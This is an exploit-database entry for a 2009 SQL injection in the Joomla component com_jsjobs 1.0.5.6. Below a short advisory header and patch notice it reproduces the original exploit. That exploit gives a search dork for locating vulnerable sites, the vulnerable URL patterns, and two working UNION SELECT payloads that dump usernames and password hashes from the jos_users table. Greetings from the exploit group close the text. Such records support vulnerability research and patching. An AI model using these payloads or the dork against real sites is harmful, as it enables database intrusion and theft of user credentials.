Joomla Component com_jsjobs Multiple SQL injection vulnerability

vendor:

JS Jobs

by:

kaMtiEz

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: JS Jobs

Affected Version From: 1.0.5.6

Affected Version To: 1.0.5.6

Patch Exists: YES

Related CWE: N/A

CPE: a:joomshark:js_jobs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_jsjobs Multiple SQL injection vulnerability

A vulnerability exists in Joomla Component com_jsjobs which allows an attacker to inject malicious SQL queries via the 'vm' and 'vj' parameters in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.

Source

Exploit-DB raw data:

##########################################################################
## Joomla Component com_jsjobs Multiple SQL injection vulnerability 	##
## Author : kaMtiEz (kamzcrew@yahoo.com)				##
## Homepage : http://www.indonesiancoder.com    	     		##
## Date : December 9, 2009 						##
##########################################################################

[ Software Information ]

[+] Vendor : http://www.joomshark.com/
[+] Download : http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23:js-jobs
[+] version : 1.0.5.6
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_jsjobs"
[+] LOCATION : INDONESIA - JOGJA
[+] Note : this extension have 2 categories .. free and commercial :D
[+] price : 20$

##########################################################################
[ HERE WE GO ... LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_company&vm=kaMz&md=[INDONESIANCODER]

http://server/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=kaMtiEz&jobcat=Tukulesto&oi=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,@@version,666,666+from+jos_users--

-666+union+select+666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,666,version(),666,666,666,666,666,666,666,666,666,6666+from+jos_users--


##########################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy,Jack- and YOU!!

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] selamat hari korupsi :D .. 
[+] Tukulesto : xpl terossssssssssss ... 
[+] Gh4mb4S : sabar yach .. pasti ada hasil .. hahhaa
[+] dimanakah keadilan di tanah airku tercinta ??

[ EOF ]
[+] INDONESIANCODER TEAM
[+] KILL -9 TEAM